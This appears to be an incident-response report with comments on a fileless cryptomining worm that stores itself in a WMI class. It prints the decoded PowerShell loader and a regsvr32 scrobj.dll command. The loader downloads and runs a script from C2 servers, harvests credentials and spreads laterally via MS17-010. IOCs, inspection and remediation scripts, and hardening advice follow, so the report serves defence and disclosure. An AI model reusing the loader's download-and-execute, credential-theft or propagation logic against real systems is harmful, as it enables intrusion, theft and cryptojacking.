QBwACAAJABzAGMADQAKAAkACQAJAAkACQBpAGYAIAAoACEAKAAkAHIAZQBzACAALQBlAHEAIAAkAHQAcgB1AGUAKQApAA0ACgAJAAkACQAJAAkAewBlAGIAOAAgACQAaQBwACAAJABzAGMAfQANAAoACQAJAAkACQAJACQAaQAxADcAIAA9ACAAJABpADEANwAgACsAIAAiACAAIgArACQAaQBwAA0ACgAJAAkACQAJAH0ADQAKAAkACQAJAH0ADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAfQANAAoADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQA
ZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==

 

powershell.exe is a command-line shell and scripting environment. The switches used here:

No.   Switch      Meaning
1     -NoP        -NoProfile: do not load the PowerShell profile
2     -NonI       -NonInteractive: do not present an interactive prompt to the user
3     -W Hidden   -WindowStyle Hidden: hide the console window
4     -E          -EncodedCommand: take the command as a base64-encoded (UTF-16LE) string

I am not a programmer, so decoding the base64 string above and annotating the code was partly guesswork; the main thing it conveys is that part of the content points the next step at WMI. As said above, doing this during the response itself is best; at the time I searched on keywords for material that experts had already written and used that for the next step:

$pin = new-object system.net.networkinformation.ping
$se=@(('update.7h4uk.com'),('info.7h4uk.com'),('111.90.145.52'),('185.234.217.139'))
$avgs = @()
$nic = 'update.7h4uk.com'

# Ping each C2 host four times and pick one that is up with acceptable latency
for($i=0;$i -le 3;$i++){
    $sum = 0
    $count = 0
    for($j=1;$j -le 4;$j++){
        $tmp = ($pin.send($se[$i])).RoundtripTime
        if ($tmp -ne 0){
            $count += 1
        }
        $sum += $tmp
    }
    if ($count -ne 0){
        $avgs += $sum/$count
    }else{
        $avgs += 0
    }
    if ($i -eq 0){
        if (($avgs[0] -le 300) -and ($avgs[0] -ne 0)){
            $nic = $se[0]
            break
        }
    }
    if ($i -eq 1){
        if ($avgs[1] -ne 0){
            if (($avgs[0] -le $avgs[1]) -and ($avgs[0] -ne 0)){
                $nic = $se[0]
                break
            }else{
                $nic = $se[1]
                break
            }
        }
    }
    if ($i -eq 2){
        if (($avgs[2] -le 300) -and ($avgs[2] -ne 0)){
            $nic = $se[2]
            break
        }
    }
    if ($i -eq 3){
        if ($avgs[3] -ne 0){
            if (($avgs[2] -le $avgs[3]) -and ($avgs[2] -ne 0)){
                $nic = $se[2]
                break
            }else{
                $nic = $se[3]
                break
            }
        }
    }
}

# Version check: if the server's version differs from the one stored in WMI, fetch antivirus.ps1
# and run it in memory (note: plain HTTP on port 443)
$nic=$nic+(':'+'443')
$ver=(New-Object Net.WebClient).DownloadString("http://$nic/ver.txt").Trim()
if($ver -ne $null){
    $ver_tmp=([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['ver'].Value
    if($ver -ne $ver_tmp){
        IEX (New-Object Net.WebClient).DownloadString("http://$nic/antivirus.ps1")
        return
    }
}

# Start of a run-time budget (TickCount is milliseconds since boot); compared against 5400 s below
$stime=[Environment]::TickCount

# Load the "funs" property of root\default:System_Anti_Virus_Core: base64 PowerShell defining the
# helper functions used below (WMI exec and MS17-010/EternalBlue code: RunDDOS, KillBot, Get-creds,
# Get-networkrange, Get-IpInB, Test-Port, test-ip, eb7, eb8, $RemoteScriptBlock and the PingCastle scanner)
$funs = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['funs'].Value
$defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))
iex $defun

# Remove every WMI permanent-event binding in root\subscription except those whose filter matches
# 'Windows Events' (presumably its own persistence): this evicts competing WMI implants
Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object {$_.filter -notmatch 'Windows Events'} | Remove-WmiObject

# PIDs of the running powershell.exe processes, highest CPU first
[array]$psids= get-process -name powershell | sort cpu -Descending | ForEach-Object {$_.id}
$tcpconn = netstat -anop tcp
$exist=$False

# Is this host already mining? True if some powershell.exe owns an ESTABLISHED TCP connection
# to remote port 80, 14444 or 14433 (the pool ports it uses)
if ($psids -ne $null )
{
    foreach ($t in $tcpconn)
    {
        $line = $t.split(' ') | ?{$_}
        if ($line -eq $null)
        {continue}
        if (($psids -contains $line[-1]) -and $t.contains("ESTABLISHED") -and ($t.contains(":80 ") -or $t.contains(":14444") -or $t.contains(":14433")) )
        {
            $exist=$true
            break
        }
    }
}

# !!! Both functions come from "funs": start the DDoS component and kill competing bots
RunDDOS "cohernece.exe"
KillBot('System_Anti_Virus_Core')

# Kill other miners: any process with an ESTABLISHED connection to remote port 3333, 5555 or 7777
foreach ($t in $tcpconn)
    {
        $line = $t.split(' ') | ?{$_}
        if (!($line -is [array])){continue}
        if(($line[-3].contains(":3333") -or $line[-3].contains(":5555") -or $line[-3].contains(":7777")) -and $t.contains("ESTABLISHED"))
        {
            $evid=$line[-1]
            Get-Process -id $evid | stop-process -force
        }
    }

# Not mining yet and at most 8 powershell.exe processes: spawn a hidden powershell that loads "funs"
# again and hands the "mon" property (the miner) to $RemoteScriptBlock for in-memory execution
if (!$exist -and ($psids.count -le 8))
{
    $cmdmon="powershell -NoP -NonI -W Hidden `"`$mon = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['mon'].Value;`$funs = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-Command  -ScriptBlock `$RemoteScriptBlock -ArgumentList @(`$mon, `$mon, 'Void', 0, '', '')`""
    $vbs = New-Object -ComObject WScript.Shell
    $vbs.run($cmdmon,0)
}

# Credential harvesting: the "mimi" property is passed to Get-creds (from "funs"), which returns
# credential material $a and a flag $NTLM. If the third token of $a is not 32 characters long
# (i.e. not an NTLM hash, so presumably a clear-text password) it is written to %TEMP%\a25hY2tlcmVk.txt
$NTLM=$False
$mimi = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['mimi'].Value
$a, $NTLM= Get-creds $mimi $mimi
if (($a -Split " ")[2].length -ne 32)
{
    ($a -Split " ")[2] | Out-File -Encoding ascii "$env:temp\a25hY2tlcmVk.txt"
}

$Networks = [System.Net.DNS]::GetHostByName($null).AddressList
# "ipsu": hosts already compromised via WMI exec; "i17": hosts already hit with MS17-010;
# "sc": base64 payload bytes handed to the MS17-010 exploit functions
$ipsu = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['ipsu'].Value
$i17 = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['i17'].Value
$scba= ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['sc'].Value
# decode "sc" into a byte array
[byte[]]$sc=[System.Convert]::FromBase64String($scba)

foreach ($Network in $Networks)
{
    $IPAddress  = $Network.IPAddressToString
    # skip link-local (APIPA) addresses
    if ($IPAddress -match '^169.254'){continue}
    $SubnetMask  = '255.255.255.0'
    # Target list: the local /24 from Get-networkrange plus the ranges returned by Get-IpInB (both from "funs")
    $ips_c=Get-networkrange $IPAddress $SubnetMask
    $ips_b=Get-IpInB $IPAddress
    $ips=$ips_c+$ips_b
    $tcpconn = netstat -anop tcp
    # Add the remote end of every ESTABLISHED connection (except loopback) to the target list
    foreach ($t in $tcpconn)
    {
        $line = $t.split(' ') | ?{$_}
        if (!($line -is [array])){continue}
        if ($line.count -le 4){continue}
        # remote address without the port
        $i=$line[-3].split(':')[0]
        if ( ($line[-2] -eq 'ESTABLISHED') -and  ($i -ne '127.0.0.1') -and ($ips -notcontains $i))
        {
            $ips+=$i
        }
    }
    # Stop spreading once 5400 s (90 minutes) have elapsed since $stime
    if(([Environment]::TickCount-$stime)/1000 -gt 5400){break}
    foreach ($ip in $ips)
    {
        if(([Environment]::TickCount-$stime)/1000 -gt 5400){break}
        if ($ip -eq $IPAddress){continue}
        # Port reachable (Test-Port) and not already taken via WMI exec
        if ((Test-Port $ip) -ne $false -and $ipsu -notcontains $ip)
        {
            $re=0
            # First try the harvested credentials over WMI (test-ip, from "funs")
            if ($a.count -ne 0)
            {$re = test-ip -ip $ip -creds $a  -nic $nic -ntlm $NTLM }
            if ($re -eq 1){$ipsu=$ipsu +" "+$ip}
            else
            {
                # Fall back to MS17-010 (EternalBlue): scan with PingCastle's checker, then exploit (eb7, then eb8) with $sc
                $vul=[PingCastle.Scanners.m17sc]::Scan($ip)
                if ($vul -and $i17 -notcontains $ip)
                {
                   $res=eb7 $ip $sc
                   if (!($res -eq $true))
                   {eb8 $ip $sc}
                   $i17 = $i17 +" "+$ip
                }
            }
        }
    }
 }

# Write the updated victim lists back into the WMI class
$StaticClass=New-Object Management.ManagementClass('root\default:System_Anti_Virus_Core')
# hosts compromised via WMI exec
$StaticClass.SetPropertyValue('ipsu' ,$ipsu)
$StaticClass.Put()
# hosts compromised via MS17-010
$StaticClass.SetPropertyValue('i17' ,$i17)
$StaticClass.Put()

2.8 powershell.exe (PID 3180)

Same payload as the previous powershell.exe process; see 2.7.

2.9 WmiClass check

Analysing the memory contents of PID 3964 shows that every malicious component is stored in the WMI class root\default:System_Anti_Virus_Core; when a component is needed it is read from the class and executed directly in memory, which is how local fileless mining and intranet propagation are achieved without files on disk.

Windows ships wbemtest.exe for managing Windows Management Instrumentation. Scrolling to the bottom of the class's property list shows each of the properties referenced in the PID 3964 memory data.
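Besides wbemtest, the class can be read from PowerShell. The script below is an added example (not from the report) that dumps every static property of root\default:System_Anti_Virus_Core to a case folder, base64-decodes those that look encoded (funs and sc are stored that way) so they can be analysed offline, and then lists the permanent event subscriptions in root\subscription, where WMI persistence lives. The output folder is an assumption; run it as Administrator.

```powershell
# Added inspection script (not the report's own code). $OutDir is an assumed case folder.
param(
    [string]$Namespace = 'root\default',
    [string]$ClassName = 'System_Anti_Virus_Core',
    [string]$OutDir    = "$env:SystemDrive\IR\wmi_dump"
)

New-Item -ItemType Directory -Force -Path $OutDir | Out-Null

if (-not (Get-CimClass -Namespace $Namespace -ClassName $ClassName -ErrorAction SilentlyContinue)) {
    Write-Host "class ${Namespace}:${ClassName} is not present"
} else {
    # The loader reads class-level (static) property values via ([WmiClass]'...').Properties['x'].Value,
    # so read them the same way rather than through instances (the class has none).
    $cls = [wmiclass]"${Namespace}:${ClassName}"
    foreach ($prop in $cls.Properties) {
        $val = [string]$prop.Value
        $raw = Join-Path $OutDir "$($prop.Name).txt"
        $val | Out-File -Encoding ascii $raw
        $info = [ordered]@{ Property = $prop.Name; Length = $val.Length; DecodedTo = '' }
        # funs and sc are base64 in the decoded loader; decode anything that looks like base64
        if ($val.Length -gt 64 -and $val -match '^[A-Za-z0-9+/=\s]+$') {
            try {
                $bytes = [Convert]::FromBase64String($val)
                $dec   = Join-Path $OutDir "$($prop.Name).decoded.bin"
                [IO.File]::WriteAllBytes($dec, $bytes)
                $info.DecodedTo = $dec
            } catch { }
        }
        [pscustomobject]$info
    }
}

# WMI persistence lives in root\subscription: a filter (WQL trigger), a consumer (what runs) and a
# binding joining them. The decoded loader deletes every binding except those whose filter matches
# 'Windows Events', so entries with that name deserve particular attention.
Write-Host "`n== __EventFilter =="
Get-CimInstance -Namespace root\subscription -ClassName __EventFilter |
    Format-Table Name, Query -AutoSize -Wrap
Write-Host "== __EventConsumer =="
Get-CimInstance -Namespace root\subscription -ClassName __EventConsumer |
    Format-Table Name, @{n='Type';e={$_.CimClass.CimClassName}}, CommandLineTemplate, ScriptText -AutoSize -Wrap
Write-Host "== __FilterToConsumerBinding =="
Get-CimInstance -Namespace root\subscription -ClassName __FilterToConsumerBinding |
    Format-Table @{n='Filter';e={$_.Filter.Name}}, @{n='Consumer';e={$_.Consumer.Name}} -AutoSize
```

The decoded funs blob is PowerShell text (it is fed to iex after decoding), so the .decoded.bin for funs can be opened as a script; sc decodes to raw bytes.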

2.9.1 ver property (as I cannot code, the functions below were verified from packet captures)

The payload resolves the C2 domains over DNS and pings the servers to check they are up.

The capture shows that the very first action is the version check; when the versions differ, antivirus.ps1 is downloaded.

After the update, the server-side and local versions match.

Server-side version (screenshot)

Local version (screenshot)

2.9.2 funs property

The funs content was base64-decoded and submitted to an online AV service for scanning.

2.9.3 ipsu / i17 / mimi / sc properties

ipsu and i17 are empty because neither the wmiexec nor the MS17-010 attacks succeeded here.

mimi and sc were not analysed further due to limited expertise.

2.9.4 mon property

Not analysed at the code level; PID 3180 loads the mon content to carry out the mining.

2.9.5 Intranet propagation

From the memory contents of PID 3964 and PID 3180, both processes load funs to carry out intranet propagation.

Live hosts are found at the ARP level (capture):

A TCP three-way handshake is used to test whether port 445 is open on hosts in the target range (capture):

2.10 antivirus.ps1 check

PID 3964 fetches this file and loads it straight into memory without writing it to disk, and it could not be downloaded in a browser even with identical request headers, so further analysis was not possible at the time (it later turned out that issuing the request from the command line and redirecting the output to a file is enough to obtain it). Judging from the process's behaviour, the file at least modifies the WmiClass and downloads cohernece.exe and other malicious components.

2.11 cohernece.exe check

The file was created on 12 January 2019 at 01:30.

The same directory also holds java-log-9527.log; according to public references this file is the attack payload used by cohernece.exe.

2.12 Related findings

Searching by file name finds the file in several directories (red boxes in the screenshot):

Searching by the file's creation time turns up files created at the same moment in an extremely obscure directory:

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5

This is the Internet Explorer (WinINet) cache of the SYSTEM account, which is where web content fetched by a process running as SYSTEM, such as a scheduled task, ends up. A new htm file appears there every 20 minutes.

Decoding one of them shows, going by the names used, that its job is to check the version and to update when the local and server-side versions differ.

Summary of the downloaded content (screenshot):

Because the files appear at a fixed interval, the scheduled tasks were checked and malicious tasks were found (screenshots):

Two scheduled tasks periodically run the following. These are regsvr32.exe arguments: regsvr32 fetches the scriptlet from the URL and executes it through scrobj.dll, so nothing has to be written to disk deliberately, and the htm files above are consistent with being the cache copies of that download:

/u /s /i:http://update.7h4uk.com/antivirus.php scrobj.dll

The URL as written could not be downloaded; replacing port 80 with 443 (http://update.7h4uk.com:443/antivirus.php) works, matching the ':443' that the decoded PowerShell appends to the host name.

2.13 IOCs

2.13.1 Domains

update.7h4uk.com
info.7h4uk.com
f4keu.7h4uk.com
xmr-eu1.nanopool.org (Monero mining pool)

2.13.2 IPs

185.234.217.139
185.234.217.111
111.90.145.52
151.80.144.25
51.255.34.118
51.15.65.182
164.132.109.110
213.32.29.143
51.15.54.102
51.15.78.68
5.196.13.29
217.182.169.148
5.196.23.240

2.13.3 MD5

cohernece.exe 4fe2de6fbb278e56c23e90432f21f6c8
9527.log      c2e31d4b8d6f9169d4557587b9d595ec

III. Response actions

After confirming the situation with the user, the following was carried out on the intranet host to remove the malware:

1. Deleted the scheduled tasks from Task Scheduler;

2. Killed PID 3964, PID 3180 and cohernece.exe, in that order;

3. Deleted the funs, i17, ipsu, mimi, mon, sc and ver properties of root\default:System_Anti_Virus_Core in WMI;

4. Deleted cohernece.exe and antivirus*.htm.
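The four steps above, together with the scheduled-task hunt from section 2.12, as an added example script (not part of the report). It runs in audit mode unless -Execute is given, so the findings can be reviewed before anything is removed. The indicators are those from this report; the search roots, the process-selection rule and the decision to delete the whole WMI class rather than only its properties are assumptions.

```powershell
# Added remediation script (not the report's own code). Run as Administrator; add -Execute to act.
param([switch]$Execute)

$Indicators  = 'scrobj.dll', '7h4uk.com', 'antivirus.php', 'antivirus.ps1'
$WmiNs       = 'root\default'
$WmiClass    = 'System_Anti_Virus_Core'
$DropNames   = 'cohernece.exe', 'java-log-9527.log', 'antivirus*.htm'
$SearchRoots = "$env:SystemRoot",
               "$env:SystemRoot\System32\config\systemprofile\AppData\Local\Microsoft\Windows"  # assumed roots

function Invoke-Step {
    # Print what would happen; only run the action when -Execute was given
    param([string]$What, [scriptblock]$Action)
    if ($Execute) { Write-Host "[do]    $What"; & $Action } else { Write-Host "[audit] $What" }
}

# 1. Scheduled tasks whose action matches an indicator (here: regsvr32 /u /s /i:http://... scrobj.dll)
foreach ($task in Get-ScheduledTask) {
    foreach ($act in $task.Actions) {
        $cmd = "$($act.Execute) $($act.Arguments)"
        if ($Indicators | Where-Object { $cmd -like "*$_*" }) {
            Invoke-Step "unregister task $($task.TaskPath)$($task.TaskName) [$cmd]" {
                Unregister-ScheduledTask -TaskName $task.TaskName -TaskPath $task.TaskPath -Confirm:$false
            }
        }
    }
}

# 2. Processes: hidden, encoded powershell loaders and the DDoS binary. Parents are stopped before
#    their children (the report killed 3964, then 3180, then cohernece.exe) so nothing is respawned.
$targets = @(Get-CimInstance Win32_Process | Where-Object {
    $_.ProcessId -ne $PID -and (
        $_.Name -ieq 'cohernece.exe' -or
        ($_.Name -ieq 'powershell.exe' -and
         $_.CommandLine -match '(?i)-W(indowStyle)?\s+Hidden' -and
         $_.CommandLine -match '(?i)\s-E(c|nc(odedCommand)?)?\s'))
})
$targetIds = $targets | ForEach-Object { $_.ProcessId }
$ordered   = @($targets | Where-Object { $targetIds -notcontains $_.ParentProcessId }) +
             @($targets | Where-Object { $targetIds -contains    $_.ParentProcessId })
foreach ($p in $ordered) {
    Invoke-Step "stop $($p.Name) PID $($p.ProcessId) (parent $($p.ParentProcessId))" {
        Stop-Process -Id $p.ProcessId -Force -ErrorAction SilentlyContinue
    }
}

# 3. The WMI storage class. The report cleared its properties; deleting the class removes them all.
if (Get-CimClass -Namespace $WmiNs -ClassName $WmiClass -ErrorAction SilentlyContinue) {
    Invoke-Step "delete WMI class ${WmiNs}:${WmiClass}" { ([wmiclass]"${WmiNs}:${WmiClass}").Delete() }
}
# Permanent event consumers referencing an indicator, plus the bindings that point at them.
# (The loader spares bindings whose filter matches 'Windows Events'; review those by hand.)
foreach ($c in Get-CimInstance -Namespace root\subscription -ClassName __EventConsumer) {
    $body = "$($c.CommandLineTemplate) $($c.ScriptText)"
    if ($Indicators | Where-Object { $body -like "*$_*" }) {
        foreach ($b in Get-CimInstance -Namespace root\subscription -ClassName __FilterToConsumerBinding |
                 Where-Object { $_.Consumer.Name -eq $c.Name }) {
            Invoke-Step "remove binding -> consumer $($c.Name)" { $b | Remove-CimInstance }
        }
        Invoke-Step "remove consumer $($c.Name)" { $c | Remove-CimInstance }
    }
}

# 4. Dropped files, including the 20-minute htm drops in the SYSTEM profile's IE cache
foreach ($f in Get-ChildItem -Path $SearchRoots -Recurse -Force -Include $DropNames -ErrorAction SilentlyContinue) {
    Invoke-Step "delete $($f.FullName)" { Remove-Item -LiteralPath $f.FullName -Force }
}
```

On hosts older than Windows 8 / Server 2012 the ScheduledTasks module is absent; use schtasks /query /v /fo csv to find the task and schtasks /delete /tn <name> /f to remove it. Re-run the script without -Execute afterwards to confirm nothing is left.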

IV. Baseline protection check

4.1 Firewall and MS17-010

Port 445 was exposed without the MS17-010 patches installed. There was no third-party anti-virus or application-layer firewall, and the host's network-layer firewall was disabled, so inbound access to high-risk local ports could not be controlled.

4.2 Tomcat logs

Tomcat access logging was not enabled.

V. Conclusions and recommendations

5.1 Conclusion

The high CPU usage on the intranet host was caused by cryptomining. Because Tomcat access logging was disabled, the initial intrusion could not be traced at the web layer. Given the findings in 4.1, however, the malware described in section II is fully capable of automated lateral movement against any intranet host that is as poorly protected.

5.2 Recommendations

To reduce the chance of ransomware, mining or similar incidents once an attacker has obtained administrative access, at a minimum:

1. Tighten inbound access control: access to application systems should pass through multiple layers of application protection;

2. Management of servers from the intranet should go through a bastion host for control and audit; management from the Internet should first enter the intranet over an encrypted VPN and then go through the bastion host;

3. Tighten outbound control: for Internet-facing or externally exposed application systems, do only port mapping or bidirectional NAT at the Internet edge; unless strictly necessary, do not let the application system's IP reach the Internet through the edge proxy;

4. Application systems should undergo code audit and penetration testing before being exposed to the Internet or to external users;

5. Do not lower the security standard of a server because it is "only a test server": by the weakest-link principle, a compromised test server becomes a pivot for lateral movement into the intranet. Hence, once more: unless strictly necessary, business servers must not initiate connections to the Internet, so that an attacker who gains administrative access cannot reverse-shell that access out to the Internet;

6. Office endpoints must guard against USB-drop phishing and cross-infection; do not open documents, programs or email attachments of unknown origin, to prevent social-engineering phishing.

*Original author: 竹林再遇北极熊. This article is part of the FreeBuf original-content reward programme; reproduction without permission is prohibited.

Comments (10)

• 123 (2019-07-05, #1)

    Just stop the winmgmt service and be done with it.

    • langyajiekou (level 6, 2019-07-05)

        @123 Some management tasks need it; it can't be stopped.

    • 竹林再遇北极熊 (level 1, 安徽三实, 2019-07-07)

        winmgmt is only the platform it runs on; once they have broken in, whatever can be enabled will be enabled. In the end it comes down to the approach and the security awareness you describe, which you must have: anything high-risk that is not strictly necessary, whether from an operations or an incident-response standpoint, I really do not recommend exposing or running; otherwise this kind of incident would not arise at all.

• A-new (level 1, 2019-07-05, #2)

    PowerGhost; there were articles about this a long time ago.

    • 竹林再遇北极熊 (level 1, 安徽三实, 2019-07-07)

        First, I specifically looked up FreeBuf's "About us" page; some of what it says is not at odds with this reply, and since the article passed editorial review it certainly does not duplicate other articles.
        Also, my boss told us long ago that a problem you already know how to solve always seems simple. If you have handled a problem you did not know how to solve, solving it is a step up; writing it up is another step up; talking it through, being unable to explain it or being stumped by someone's question, and then working it out, is yet another step up. So the purpose is not merely sharing; it is mostly improving yourself.

• Meloncn (2019-07-06, #3)

    We recently found this in our cluster too.

    • 竹林再遇北极熊 (level 1, 安徽三实, 2019-07-07)

        "Our cluster" says you are either in ops or on the customer side. Success takes countless drops of sweat, but failure needs only one cause; luckily this was not ransomware, just a somewhat high CPU, otherwise however busy the boss is, all he would see is the word "incident".

• 热心市民王先生 (level 1, 2019-07-06, #4)

    We recently found this in our cluster too; it scans your intranet, connects to port 445 on other hosts and also brute-forces passwords. (Weifang, Shandong)

    • 竹林再遇北极熊 (level 1, 安徽三实, 2019-07-07)

        Just on the scanning, two places need attention. One is blocking at the gateway: even in a hyper-converged environment the virtualised segment has a gateway; find it and restrict there, whether by scan signature or by 5-tuple. The other is restricting on the server itself, because traffic within a subnet does not cross the gateway. Servers can also limit the number of logon attempts locally.

• 一个摸索安全的人 (2019-07-08, #5)

    We found this in a customer environment as well. We spotted the scheduled task first, so we applied process control on PowerShell globally, then deleted the scheduled task and killed the processes the author lists. Seeing the author's write-up reinforced it for me, thanks!
